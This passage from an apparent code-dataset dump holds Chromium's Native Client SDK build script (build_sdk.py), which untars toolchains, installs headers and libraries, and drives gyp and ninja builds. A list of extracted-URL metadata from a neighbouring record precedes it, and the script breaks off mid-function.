['URL', 'self.mo'], ['URL', 'obj.st'], ['URL', 'self.mo'], ['URL', 'mock.pa'], ['URL', 'self.mo'], ['URL', 'self.mo'], ['URL', 'obj.st'], ['URL', 'self.ad'], ['URL', 'self.mo'], ['URL', 'obj.st'], ['URL', 'self.mo'], ['URL', 'mp.re'], ['URL', 'self.ro'], ['URL', 'self.mo'], ['URL', 'ibd.re'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'self.de'], ['URL', 'self.ro'], ['URL', 'self.im'], ['URL', 'self.mo'], ['URL', 'ibd.as'], ['URL', 'self.ro'], ['URL', 'self.mo'], ['URL', 'mp.as'], ['URL', 'self.de'], ['URL', 'self.ro'], ['URL', 'self.co'], ['URL', 'self.mo'], ['URL', 'ibd.si'], ['URL', 'mock.ca'], ['URL', 'self.ro'], ['URL', 'mock.ca'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'self.de'], ['URL', 'self.ro'], ['URL', 'self.im'], ['URL', 'self.as'], ['URL', 'self.mo'], ['URL', 'ibd.ca'], ['URL', 'self.mo'], ['URL', 'mp.as'], ['URL', 'self.de'], ['URL', 'self.ro'], ['URL', 'self.co'], ['URL', 'self.mo'], ['URL', 'mp.re'], ['URL', 'self.mo'], ['URL', 'ibd.si'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'self.de'], ['URL', 'self.ro'], ['URL', 'self.im'], ['URL', 'self.as'], ['URL', 'self.mo'], ['URL', 'ibd.ca'], ['URL', 'self.mo'], ['URL', 'mp.as'], ['URL', 'self.de'], ['URL', 'self.ro'], ['URL', 'self.co'], ['URL', 'mock.pa'], ['URL', 'self.mo'], ['URL', 'mp.re'], ['URL', 'self.mo'], ['URL', 'ibd.si'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'self.de'], ['URL', 'self.ro'], ['URL', 'self.im'], ['URL', 'self.mo'], ['URL', 'mp.as'], ['URL', 'self.de'], ['URL', 'self.ro'], ['URL', 'self.de'], ['URL', 'self.ro'], ['URL', 'self.co'], ['URL', 'self.pa'], ['URL', 'self.de'], ['URL', 'exc.re'], ['URL', 'utils.ma'], ['URL', 'self.de'], ['URL', 'self.ro'], ['URL', 'self.co'], ['URL', 'self.pa'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'exc.as'], ['URL', 'self.pa'], ['URL', 'exc.re'], ['URL', 'utils.ma'], ['URL', 'self.de'], ['URL', 'self.ro'], ['URL', 'self.co'], ['URL', 'mock.ca'], ['URL', 'exc.as'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'self.de'], ['URL', 'self.no'], ['URL', 'gz.re'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'utils.de'], ['URL', 'self.de'], ['URL', 'self.no'], ['URL', 'exec.as'], ['URL', 'self.as'], ['URL', 'gz.ca'], ['URL', 'gz.si'], ['URL', 'processutils.Pro'], ['URL', 'mock.ca'], ['URL', 'self.as'], ['URL', 'processutils.Pro'], ['URL', 'utils.de'], ['URL', 'self.de'], ['URL', 'self.no'], ['URL', 'exec.as'], ['URL', 'exec.si'], ['URL', 'processutils.Pro'], ['URL', 'mock.ca'], ['URL', 'self.as'], ['URL', 'processutils.Pro'], ['URL', 'utils.de'], ['URL', 'self.de'], ['URL', 'self.no'], ['URL', 'exec.as'], ['URL', 'self.as'], ['URL', 'gz.ca'], ['URL', 'mock.pa'], ['URL', 'self.de'], ['URL', 'self.no'], ['URL', 'exec.re'], ['URL', 'mock.ca'], ['URL', 'self.de'], ['URL', 'utils.ge'], ['URL', 'self.de'], ['URL', 'exec.as'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'qinfo.re'], ['URL', 'mock.Pro'], ['URL', 'dd.as'], ['URL', 'self.as'], ['URL', 'cg.ca'], ['URL', 'qinfo.re'], ['URL', 'mock.Pro'], ['URL', 'cg.as'], ['URL', 'self.as'], ['URL', 'dd.ca'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'self.sk'], ['URL', 'self.fi'], ['URL', 'tempfile.Na'], ['URL', 'self.file.cl'], ['URL', 'self.file.na'], ['URL', 'mock.pa'], ['URL', 'self.file.na'], ['URL', 'partitioner.li'], ['URL', 'self.file.na'], ['URL', 'self.as'], ['URL', 'self.file.na'], ['URL', 'partitioner.li'], ['URL', 'self.file.na'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'mock.pa'], ['URL', 'mock.Ma'], ['URL', 'caches.as'], ['URL', 'image.as'], ['URL', 'mock.pa'], ['URL', 'exception.In'], ['URL', 'mock.Ma'], ['URL', 'caches.si'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'caches.as'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'requests.re'], ['URL', 'mock.Ma'], ['URL', 'requests.as'], ['URL', 'gzip.as'], ['URL', 'mock.AN'], ['URL', 'copy.as'], ['URL', 'mock.AN'], ['URL', 'mock.AN'], ['URL', 'mock.pa'], ['URL', 'self.as'], ['URL', 'requests.ca'], ['URL', 'gzip.as'], ['URL', 'mock.AN'], ['URL', 'copy.as'], ['URL', 'mock.AN'], ['URL', 'mock.AN'], ['URL', 'requests.exceptions.Re'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'self.as'], ['URL', 'copy.ca'], ['URL', 'mock.pa'], ['URL', 'b64.si'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'b64.as'], ['URL', 'self.as'], ['URL', 'copy.ca'], ['URL', 'mock.pa'], ['URL', 'requests.re'], ['URL', 'mock.Ma'], ['URL', 'copy.si'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'requests.as'], ['URL', 'gzip.as'], ['URL', 'mock.AN'], ['URL', 'copy.as'], ['URL', 'mock.AN'], ['URL', 'mock.AN'], ['URL', 'utils.mo'], ['URL', 'utils.ge'], ['URL', 'self.no'], ['URL', 'utils.cr'], ['URL', 'self.co'], ['URL', 'utils.cr'], ['URL', 'self.co'], ['URL', 'self.node.id'], ['URL', 'uuidutils.ge'], ['URL', 'manager.ac'], ['URL', 'self.co'], ['URL', 'self.no'], ['URL', 'utils.ge'], ['URL', 'self.as'], ['URL', 'self.no'], ['URL', 'utils.ge'], ['URL', 'self.co'], ['URL', 'self.node.in'], ['URL', 'utils.pa'], ['URL', 'self.no'], ['URL', 'self.as'], ['URL', 'self.node.in'], ['URL', 'utils.pa'], ['URL', 'self.no'], ['URL', 'self.as'], ['URL', 'self.node.in'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'utils.pa'], ['URL', 'self.no'], ['URL', 'self.node.in'], ['URL', 'self.as'], ['URL', 'utils.is'], ['URL', 'self.no'], ['URL', 'self.node.in'], ['URL', 'self.as'], ['URL', 'utils.is'], ['URL', 'self.no'], ['URL', 'self.node.in'], ['URL', 'self.as'], ['URL', 'utils.is'], ['URL', 'self.no'], ['URL', 'self.node.pro'], ['URL', 'utils.ge'], ['URL', 'self.no'], ['URL', 'self.as'], ['URL', 'self.node.in'], ['URL', 'utils.ge'], ['URL', 'self.no'], ['URL', 'self.as'], ['URL', 'self.node.in'], ['URL', 'utils.ge'], ['URL', 'self.no'], ['URL', 'self.as'], ['URL', 'utils.mo'], ['URL', 'self.no'], ['URL', 'utils.cr'], ['URL', 'self.co'], ['URL', 'mock.pa'], ['URL', 'manager.ac'], ['URL', 'self.co'], ['URL', 'self.no'], ['URL', 'utils.tr'], ['URL', 'mock.as'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'self.node.pro'], ['URL', 'self.node.sa'], ['URL', 'mock.si'], ['URL', 'manager.ac'], ['URL', 'self.co'], ['URL', 'self.no'], ['URL', 'utils.tr'], ['URL', 'mock.as'], ['URL', 'mock.warning.as'], ['URL', 'mock.AN'], ['URL', 'mock.pa'], ['URL', 'mock.si'], ['URL', 'manager.ac'], ['URL', 'self.co'], ['URL', 'self.no'], ['URL', 'self.as'], ['URL', 'utils.tr'], ['URL', 'mock.as'], ['URL', 'mock.pa'], ['URL', 'exception.Il'], ['URL', 'mock.si'], ['URL', 'manager.ac'], ['URL', 'self.co'], ['URL', 'self.no'], ['URL', 'self.as'], ['URL', 'exception.Il'], ['URL', 'utils.tr'], ['URL', 'mock.as'], ['URL', 'utils.mo'], ['URL', 'utils.cr'], ['URL', 'self.co'], ['URL', 'self.node.id'], ['URL', 'self.cl'], ['URL', 'mock.pa'], ['URL', 'ironic.objects.Port.li'], ['URL', 'mock.pa'], ['URL', 'client.Ag'], ['URL', 'mock.re'], ['URL', 'self.cl'], ['URL', 'mock.re'], ['URL', 'manager.ac'], ['URL', 'self.co'], ['URL', 'self.no'], ['URL', 'utils.ag'], ['URL', 'mock.as'], ['URL', 'mock.AN'], ['URL', 'task.no'], ['URL', 'self.as'], ['URL', 'task.no'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.cl'], ['URL', 'self.as'], ['URL', 'self.cl'], ['URL', 'mock.pa'], ['URL', 'ironic.objects.Port.li'], ['URL', 'mock.pa'], ['URL', 'client.Ag'], ['URL', 'self.cl'], ['URL', 'mock.re'], ['URL', 'self.cl'], ['URL', 'mock.re'], ['URL', 'manager.ac'], ['URL', 'self.co'], ['URL', 'self.no'], ['URL', 'self.as'], ['URL', 'exception.No'], ['URL', 'utils.ag'], ['URL', 'mock.as'], ['URL', 'mock.AN'], ['URL', 'task.no'], ['URL', 'mock.pa'], ['URL', 'ironic.objects.Port.li'], ['URL', 'mock.pa'], ['URL', 'client.Ag'], ['URL', 'mock.re'], ['URL', 'mock.re'], ['URL', 'manager.ac'], ['URL', 'self.co'], ['URL', 'self.no'], ['URL', 'utils.ag'], ['URL', 'self.cl'], ['URL', 'self.as'], ['URL', 'states.CL'], ['URL', 'mock.pa'], ['URL', 'ironic.objects.Port.li'], ['URL', 'mock.pa'], ['URL', 'client.Ag'], ['URL', 'mock.re'], ['URL', 'mock.re'], ['URL', 'manager.ac'], ['URL', 'self.co'], ['URL', 'self.no'], ['URL', 'utils.ag'], ['URL', 'self.cl'], ['URL', 'self.as'], ['URL', 'states.CL'], ['URL', 'mock.pa'], ['URL', 'ironic.objects.Port.li'], ['URL', 'mock.pa'], ['URL', 'client.Ag'], ['URL', 'mock.re'], ['URL', 'mock.re'], ['URL', 'manager.ac'], ['URL', 'self.co'], ['URL', 'self.no'], ['URL', 'utils.ag'], ['URL', 'self.cl'], ['URL', 'self.as'], ['URL', 'states.CL'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'ibd.re'], ['URL', 'exception.In'], ['URL', 'self.as'], ['URL', 'ibd.as'], ['URL', 'ibd.re'], ['URL', 'self.as'], ['URL', 'ibd.as']]" +34,"#!/usr/bin/env python +# Copyright (c) 2012 The Chromium Authors. All rights reserved. +# Use of this source code is governed by a BSD-style license that can be +# found in the LICENSE file. + +""""""Entry point for both build and try bots. + +This script is invoked from XXX, usually without arguments +to package an SDK. It automatically determines whether +this SDK is for mac, win, linux. + +The script inspects the following environment variables: + +BUILDBOT_BUILDERNAME to determine whether the script is run locally +and whether it should upload an SDK to file storage (GSTORE) +"""""" + +# pylint: disable=W0621 + +# std python includes +import argparse +import datetime +import glob +import os +import re +import sys + +if sys.version_info < (2, 7, 0): + sys.stderr.write(""python 2.7 or later is required run this script\n"") + sys.exit(1) + +# local includes +import buildbot_common +import build_projects +import build_updater +import build_version +import generate_notice +import manifest_util +import parse_dsc +import verify_filelist + +from build_paths import SCRIPT_DIR, SDK_SRC_DIR, SRC_DIR, NACL_DIR, OUT_DIR +from build_paths import NACLPORTS_DIR, GSTORE, GONACL_APPENGINE_SRC_DIR + +# Add SDK make tools scripts to the python path. +sys.path.append(os.path.join(SDK_SRC_DIR, 'tools')) +sys.path.append(os.path.join(NACL_DIR, 'build')) + +import getos +import oshelpers + +BUILD_DIR = os.path.join(NACL_DIR, 'build') +NACL_TOOLCHAIN_DIR = os.path.join(NACL_DIR, 'toolchain') +NACL_TOOLCHAINTARS_DIR = os.path.join(NACL_TOOLCHAIN_DIR, '.tars') + +CYGTAR = os.path.join(BUILD_DIR, 'cygtar.py') +PKGVER = os.path.join(BUILD_DIR, 'package_version', 'package_version.py') + +NACLPORTS_URL = 'https://chromium.googlesource.com/external/naclports.git' +NACLPORTS_REV = 'PI:KEY' + +GYPBUILD_DIR = 'gypbuild' + +options = None + +# Map of: ToolchainName: (PackageName, SDKDir, arch). +TOOLCHAIN_PACKAGE_MAP = { + 'arm_glibc': ('nacl_arm_glibc', '%(platform)s_arm_glibc', 'arm'), + 'x86_glibc': ('nacl_x86_glibc', '%(platform)s_x86_glibc', 'x86'), + 'pnacl': ('pnacl_newlib', '%(platform)s_pnacl', 'pnacl') + } + + +def GetToolchainDirName(tcname): + """"""Return the directory name for a given toolchain"""""" + return TOOLCHAIN_PACKAGE_MAP[tcname][1] % {'platform': getos.GetPlatform()} + + +def GetToolchainDir(pepperdir, tcname): + """"""Return the full path to a given toolchain within a given sdk root"""""" + return os.path.join(pepperdir, 'toolchain', GetToolchainDirName(tcname)) + + +def GetToolchainLibc(tcname): + if tcname == 'pnacl': + return 'newlib' + for libc in ('glibc', 'newlib', 'host'): + if libc in tcname: + return libc + + +def GetToolchainNaClInclude(pepperdir, tcname, arch=None): + tcpath = GetToolchainDir(pepperdir, tcname) + if arch is None: + arch = TOOLCHAIN_PACKAGE_MAP[tcname][2] + if arch == 'x86': + return os.path.join(tcpath, 'x86_64-nacl', 'include') + elif arch == 'pnacl': + return os.path.join(tcpath, 'le32-nacl', 'include') + elif arch == 'arm': + return os.path.join(tcpath, 'arm-nacl', 'include') + else: + buildbot_common.ErrorExit('Unknown architecture: %s' % arch) + + +def GetConfigDir(arch): + if arch.endswith('x64') and getos.GetPlatform() == 'win': + return 'Release_x64' + else: + return 'Release' + + +def GetNinjaOutDir(arch): + return os.path.join(OUT_DIR, GYPBUILD_DIR + '-' + arch, GetConfigDir(arch)) + + +def GetGypBuiltLib(tcname, arch): + if arch == 'ia32': + lib_suffix = '32' + elif arch == 'x64': + lib_suffix = '64' + elif arch == 'arm': + lib_suffix = 'arm' + else: + lib_suffix = '' + + tcdir = 'tc_' + GetToolchainLibc(tcname) + + if tcname == 'pnacl': + if arch is None: + lib_suffix = '' + tcdir = 'tc_pnacl_newlib' + arch = 'x64' + else: + arch = 'clang-' + arch + + return os.path.join(GetNinjaOutDir(arch), 'gen', tcdir, 'lib' + lib_suffix) + + +def GetToolchainNaClLib(tcname, tcpath, arch): + if arch == 'ia32': + return os.path.join(tcpath, 'x86_64-nacl', 'lib32') + elif arch == 'x64': + return os.path.join(tcpath, 'x86_64-nacl', 'lib') + elif arch == 'arm': + return os.path.join(tcpath, 'arm-nacl', 'lib') + elif tcname == 'pnacl': + return os.path.join(tcpath, 'le32-nacl', 'lib') + + + +def GetOutputToolchainLib(pepperdir, tcname, arch): + tcpath = os.path.join(pepperdir, 'toolchain', GetToolchainDirName(tcname)) + return GetToolchainNaClLib(tcname, tcpath, arch) + + +def GetPNaClTranslatorLib(tcpath, arch): + if arch not in ['arm', 'x86-32', 'x86-64']: + buildbot_common.ErrorExit('Unknown architecture %s.' % arch) + return os.path.join(tcpath, 'translator', arch, 'lib') + + +def BuildStepDownloadToolchains(toolchains): + buildbot_common.BuildStep('Running package_version.py') + args = [sys.executable, PKGVER, '--mode', 'nacl_core_sdk'] + args.extend(['sync', '--extract']) + buildbot_common.Run(args, cwd=NACL_DIR) + + +def BuildStepCleanPepperDirs(pepperdir, pepperdir_old): + buildbot_common.BuildStep('Clean Pepper Dirs') + dirs_to_remove = ( + pepperdir, + pepperdir_old, + os.path.join(OUT_DIR, 'arm_trusted') + ) + for dirname in dirs_to_remove: + if os.path.exists(dirname): + buildbot_common.RemoveDir(dirname) + buildbot_common.MakeDir(pepperdir) + + +def BuildStepMakePepperDirs(pepperdir, subdirs): + for subdir in subdirs: + buildbot_common.MakeDir(os.path.join(pepperdir, subdir)) + +TEXT_FILES = [ + 'AUTHORS', + 'COPYING', + 'LICENSE', + 'README.Makefiles', + 'getting_started/README', +] + +def BuildStepCopyTextFiles(pepperdir, pepper_ver, chrome_revision, + nacl_revision): + buildbot_common.BuildStep('Add Text Files') + InstallFiles(SDK_SRC_DIR, pepperdir, TEXT_FILES) + + # Replace a few placeholders in README + readme_text = open(os.path.join(SDK_SRC_DIR, 'README')).read() + readme_text = readme_text.replace('${VERSION}', pepper_ver) + readme_text = readme_text.replace('${CHROME_REVISION}', chrome_revision) + readme_text = readme_text.replace('${CHROME_COMMIT_POSITION}', + build_version.ChromeCommitPosition()) + readme_text = readme_text.replace('${NACL_REVISION}', nacl_revision) + + # Year/Month/Day Hour:Minute:Second + time_format = '%Y/%m/%d %H:%M:%S' + readme_text = readme_text.replace('${DATE}', + datetime.datetime.now().strftime(time_format)) + + open(os.path.join(pepperdir, 'README'), 'w').write(readme_text) + + +def BuildStepUntarToolchains(pepperdir, toolchains): + buildbot_common.BuildStep('Untar Toolchains') + platform = getos.GetPlatform() + build_platform = '%s_x86' % platform + tmpdir = os.path.join(OUT_DIR, 'tc_temp') + buildbot_common.RemoveDir(tmpdir) + buildbot_common.MakeDir(tmpdir) + + # Create a list of extract packages tuples, the first part should be + # ""$PACKAGE_TARGET/$PACKAGE"". The second part should be the destination + # directory relative to pepperdir/toolchain. + extract_packages = [] + for toolchain in toolchains: + toolchain_map = TOOLCHAIN_PACKAGE_MAP.get(toolchain, None) + if toolchain_map: + package_name, tcdir, _ = toolchain_map + package_tuple = (os.path.join(build_platform, package_name), + tcdir % {'platform': platform}) + extract_packages.append(package_tuple) + + + # On linux we also want to extract the arm_trusted package which contains + # the ARM libraries we ship in support of sel_ldr_arm. + if platform == 'linux': + extract_packages.append((os.path.join(build_platform, 'arm_trusted'), + 'arm_trusted')) + if extract_packages: + # Extract all of the packages into the temp directory. + package_names = [package_tuple[0] for package_tuple in extract_packages] + buildbot_common.Run([sys.executable, PKGVER, + '--packages', ','.join(package_names), + '--tar-dir', NACL_TOOLCHAINTARS_DIR, + '--dest-dir', tmpdir, + 'extract']) + + # Move all the packages we extracted to the correct destination. + for package_name, dest_dir in extract_packages: + full_src_dir = os.path.join(tmpdir, package_name) + full_dst_dir = os.path.join(pepperdir, 'toolchain', dest_dir) + buildbot_common.Move(full_src_dir, full_dst_dir) + + # Cleanup the temporary directory we are no longer using. + buildbot_common.RemoveDir(tmpdir) + + +# List of toolchain headers to install. +# Source is relative to top of Chromium tree, destination is relative +# to the toolchain header directory. +NACL_HEADER_MAP = { + 'newlib': [ + ('native_client/src/include/nacl/nacl_exception.h', 'nacl/'), + ('native_client/src/include/nacl/nacl_minidump.h', 'nacl/'), + ('native_client/src/untrusted/irt/irt.h', ''), + ('native_client/src/untrusted/irt/irt_dev.h', ''), + ('native_client/src/untrusted/irt/irt_extension.h', ''), + ('native_client/src/untrusted/nacl/nacl_dyncode.h', 'nacl/'), + ('native_client/src/untrusted/nacl/nacl_startup.h', 'nacl/'), + ('native_client/src/untrusted/pthread/pthread.h', ''), + ('native_client/src/untrusted/pthread/semaphore.h', ''), + ('native_client/src/untrusted/valgrind/dynamic_annotations.h', 'nacl/'), + ('ppapi/nacl_irt/public/irt_ppapi.h', ''), + ], + 'glibc': [ + ('native_client/src/include/nacl/nacl_exception.h', 'nacl/'), + ('native_client/src/include/nacl/nacl_minidump.h', 'nacl/'), + ('native_client/src/untrusted/irt/irt.h', ''), + ('native_client/src/untrusted/irt/irt_dev.h', ''), + ('native_client/src/untrusted/irt/irt_extension.h', ''), + ('native_client/src/untrusted/nacl/nacl_dyncode.h', 'nacl/'), + ('native_client/src/untrusted/nacl/nacl_startup.h', 'nacl/'), + ('native_client/src/untrusted/valgrind/dynamic_annotations.h', 'nacl/'), + ('ppapi/nacl_irt/public/irt_ppapi.h', ''), + ], +} + +def InstallFiles(src_root, dest_root, file_list): + """"""Copy a set of files from src_root to dest_root according + to the given mapping. This allows files to be copied from + to a location in the destination tree that is different to the + location in the source tree. + + If the destination mapping ends with a '/' then the destination + basename is inherited from the the source file. + + Wildcards can be used in the source list but it is not recommended + as this can end up adding things to the SDK unintentionally. + """""" + for file_spec in file_list: + # The list of files to install can be a simple list of + # strings or a list of pairs, where each pair corresponds + # to a mapping from source to destination names. + if type(file_spec) == str: + src_file = dest_file = file_spec + else: + src_file, dest_file = file_spec + + src_file = os.path.join(src_root, src_file) + + # Expand sources files using glob. + sources = glob.glob(src_file) + if not sources: + sources = [src_file] + + if len(sources) > 1 and not dest_file.endswith('/'): + buildbot_common.ErrorExit(""Target file must end in '/' when "" + ""using globbing to install multiple files"") + + for source in sources: + if dest_file.endswith('/'): + dest = os.path.join(dest_file, os.path.basename(source)) + else: + dest = dest_file + dest = os.path.join(dest_root, dest) + if not os.path.isdir(os.path.dirname(dest)): + buildbot_common.MakeDir(os.path.dirname(dest)) + buildbot_common.CopyFile(source, dest) + + +def InstallNaClHeaders(tc_dst_inc, tcname): + """"""Copies NaCl headers to expected locations in the toolchain."""""" + InstallFiles(SRC_DIR, tc_dst_inc, NACL_HEADER_MAP[GetToolchainLibc(tcname)]) + + +def MakeNinjaRelPath(path): + return os.path.join(os.path.relpath(OUT_DIR, SRC_DIR), path) + + +# TODO(ncbray): stop building and copying libraries into the SDK that are +# already provided by the toolchain. +# Mapping from libc to libraries gyp-build trusted libraries +TOOLCHAIN_LIBS = { + 'newlib' : [ + 'libminidump_generator.a', + 'libnacl.a', + 'libnacl_dyncode.a', + 'libnacl_exception.a', + 'libnacl_list_mappings.a', + 'libnosys.a', + 'libppapi.a', + 'libppapi_stub.a', + 'libpthread.a', + ], + 'glibc': [ + 'libminidump_generator.a', + 'libminidump_generator.so', + 'libnacl.a', + 'libnacl_dyncode.a', + 'libnacl_dyncode.so', + 'libnacl_exception.a', + 'libnacl_exception.so', + 'libnacl_list_mappings.a', + 'libnacl_list_mappings.so', + 'libppapi.a', + 'libppapi.so', + 'libppapi_stub.a', + ] +} + + +def GypNinjaInstall(pepperdir, toolchains): + tools_files_32 = [ + ['sel_ldr', 'sel_ldr_x86_32'], + ['irt_core_newlib_x32.nexe', 'irt_core_x86_32.nexe'], + ['irt_core_newlib_x64.nexe', 'irt_core_x86_64.nexe'], + ] + arm_files = [ + ['elf_loader_newlib_arm.nexe', 'elf_loader_arm.nexe'], + ] + + tools_files_64 = [] + + platform = getos.GetPlatform() + + # TODO(binji): dump_syms doesn't currently build on Windows. See + # http://crbug.com/245456 + if platform != 'win': + tools_files_64 += [ + ['dump_syms', 'dump_syms'], + ['minidump_dump', 'minidump_dump'], + ['minidump_stackwalk', 'minidump_stackwalk'] + ] + + tools_files_64.append(['sel_ldr', 'sel_ldr_x86_64']) + tools_files_64.append(['ncval_new', 'ncval']) + + if platform == 'linux': + tools_files_32.append(['nacl_helper_bootstrap', + 'nacl_helper_bootstrap_x86_32']) + tools_files_64.append(['nacl_helper_bootstrap', + 'nacl_helper_bootstrap_x86_64']) + tools_files_32.append(['nonsfi_loader_newlib_x32_nonsfi.nexe', + 'nonsfi_loader_x86_32']) + + tools_dir = os.path.join(pepperdir, 'tools') + buildbot_common.MakeDir(tools_dir) + + # Add .exe extensions to all windows tools + for pair in tools_files_32 + tools_files_64: + if platform == 'win' and not pair[0].endswith('.nexe'): + pair[0] += '.exe' + pair[1] += '.exe' + + # Add ARM binaries + if platform == 'linux' and not options.no_arm_trusted: + arm_files += [ + ['irt_core_newlib_arm.nexe', 'irt_core_arm.nexe'], + ['nacl_helper_bootstrap', 'nacl_helper_bootstrap_arm'], + ['nonsfi_loader_newlib_arm_nonsfi.nexe', 'nonsfi_loader_arm'], + ['sel_ldr', 'sel_ldr_arm'] + ] + + InstallFiles(GetNinjaOutDir('x64'), tools_dir, tools_files_64) + InstallFiles(GetNinjaOutDir('ia32'), tools_dir, tools_files_32) + InstallFiles(GetNinjaOutDir('arm'), tools_dir, arm_files) + + for tc in toolchains: + if tc in ('host', 'clang-newlib'): + continue + elif tc == 'pnacl': + xarches = (None, 'ia32', 'x64', 'arm') + elif tc in ('x86_glibc', 'x86_newlib'): + xarches = ('ia32', 'x64') + elif tc == 'arm_glibc': + xarches = ('arm',) + else: + raise AssertionError('unexpected toolchain value: %s' % tc) + + for xarch in xarches: + src_dir = GetGypBuiltLib(tc, xarch) + dst_dir = GetOutputToolchainLib(pepperdir, tc, xarch) + libc = GetToolchainLibc(tc) + InstallFiles(src_dir, dst_dir, TOOLCHAIN_LIBS[libc]) + + +def GypNinjaBuild_NaCl(rel_out_dir): + gyp_py = os.path.join(NACL_DIR, 'build', 'gyp_nacl') + nacl_core_sdk_gyp = os.path.join(NACL_DIR, 'build', 'nacl_core_sdk.gyp') + all_gyp = os.path.join(NACL_DIR, 'build', 'all.gyp') + + out_dir_32 = MakeNinjaRelPath(rel_out_dir + '-ia32') + out_dir_64 = MakeNinjaRelPath(rel_out_dir + '-x64') + out_dir_arm = MakeNinjaRelPath(rel_out_dir + '-arm') + out_dir_clang_32 = MakeNinjaRelPath(rel_out_dir + '-clang-ia32') + out_dir_clang_64 = MakeNinjaRelPath(rel_out_dir + '-clang-x64') + out_dir_clang_arm = MakeNinjaRelPath(rel_out_dir + '-clang-arm') + + GypNinjaBuild('ia32', gyp_py, nacl_core_sdk_gyp, 'nacl_core_sdk', out_dir_32, + gyp_defines=['use_nacl_clang=0']) + GypNinjaBuild('x64', gyp_py, nacl_core_sdk_gyp, 'nacl_core_sdk', out_dir_64, + gyp_defines=['use_nacl_clang=0']) + GypNinjaBuild('arm', gyp_py, nacl_core_sdk_gyp, 'nacl_core_sdk', out_dir_arm, + gyp_defines=['use_nacl_clang=0']) + GypNinjaBuild('ia32', gyp_py, nacl_core_sdk_gyp, 'nacl_core_sdk', + out_dir_clang_32, gyp_defines=['use_nacl_clang=1']) + GypNinjaBuild('x64', gyp_py, nacl_core_sdk_gyp, 'nacl_core_sdk', + out_dir_clang_64, gyp_defines=['use_nacl_clang=1']) + GypNinjaBuild('arm', gyp_py, nacl_core_sdk_gyp, 'nacl_core_sdk', + out_dir_clang_arm, gyp_defines=['use_nacl_clang=1']) + GypNinjaBuild('x64', gyp_py, all_gyp, 'ncval_new', out_dir_64) + + +def GypNinjaBuild_Breakpad(rel_out_dir): + # TODO(binji): dump_syms doesn't currently build on Windows. See + # http://crbug.com/245456 + if getos.GetPlatform() == 'win': + return + + gyp_py = os.path.join(SRC_DIR, 'build', 'gyp_chromium') + out_dir = MakeNinjaRelPath(rel_out_dir) + gyp_file = os.path.join(SRC_DIR, 'breakpad', 'breakpad.gyp') + build_list = ['dump_syms', 'minidump_dump', 'minidump_stackwalk'] + GypNinjaBuild('x64', gyp_py, gyp_file, build_list, out_dir) + + +def GypNinjaBuild_PPAPI(arch, rel_out_dir, gyp_defines=None): + gyp_py = os.path.join(SRC_DIR, 'build', 'gyp_chromium') + out_dir = MakeNinjaRelPath(rel_out_dir) + gyp_file = os.path.join(SRC_DIR, 'ppapi', 'native_client', + 'native_client.gyp') + GypNinjaBuild(arch, gyp_py, gyp_file, 'ppapi_lib', out_dir, + gyp_defines=gyp_defines) + + +def GypNinjaBuild_Pnacl(rel_out_dir, target_arch): + # TODO(binji): This will build the pnacl_irt_shim twice; once as part of the + # Chromium build, and once here. When we move more of the SDK build process + # to gyp, we can remove this. + gyp_py = os.path.join(SRC_DIR, 'build', 'gyp_chromium') + + out_dir = MakeNinjaRelPath(rel_out_dir) + gyp_file = os.path.join(SRC_DIR, 'ppapi', 'native_client', 'src', + 'untrusted', 'pnacl_irt_shim', 'pnacl_irt_shim.gyp') + targets = ['aot'] + GypNinjaBuild(target_arch, gyp_py, gyp_file, targets, out_dir) + + +def GypNinjaBuild(arch, gyp_py_script, gyp_file, targets, + out_dir, gyp_defines=None): + gyp_env = dict(os.environ) + gyp_env['GYP_GENERATORS'] = 'ninja' + gyp_defines = gyp_defines or [] + gyp_defines.append('nacl_allow_thin_archives=0') + if not options.no_use_sysroot: + gyp_defines.append('use_sysroot=1') + if options.mac_sdk: + gyp_defines.append('mac_sdk=%s' % options.mac_sdk) + + if arch is not None: + gyp_defines.append('target_arch=%s' % arch) + if arch == 'arm': + gyp_env['GYP_CROSSCOMPILE'] = '1' + if options.no_arm_trusted: + gyp_defines.append('disable_cross_trusted=1') + if getos.GetPlatform() == 'mac': + gyp_defines.append('clang=1') + + gyp_env['GYP_DEFINES'] = ' '.join(gyp_defines) + # We can't use windows path separators in GYP_GENERATOR_FLAGS since + # gyp uses shlex to parse them and treats '\' as an escape char. + gyp_env['GYP_GENERATOR_FLAGS'] = 'output_dir=%s' % out_dir.replace('\\', '/') + + # Print relevant environment variables + for key, value in gyp_env.iteritems(): + if key.startswith('GYP') or key in ('CC',): + print ' %s=""%s""' % (key, value) + + buildbot_common.Run( + [sys.executable, gyp_py_script, gyp_file, '--depth=.'], + cwd=SRC_DIR, + env=gyp_env) + + NinjaBuild(targets, out_dir, arch) + + +def NinjaBuild(targets, out_dir, arch): + if type(targets) is not list: + targets = [targets] + out_config_dir = os.path.join(out_dir, GetConfigDir(arch)) + buildbot_common.Run(['ninja', '-C', out_config_dir] + targets, cwd=SRC_DIR) + + +def BuildStepBuildToolchains(pepperdir, toolchains, build, clean): + 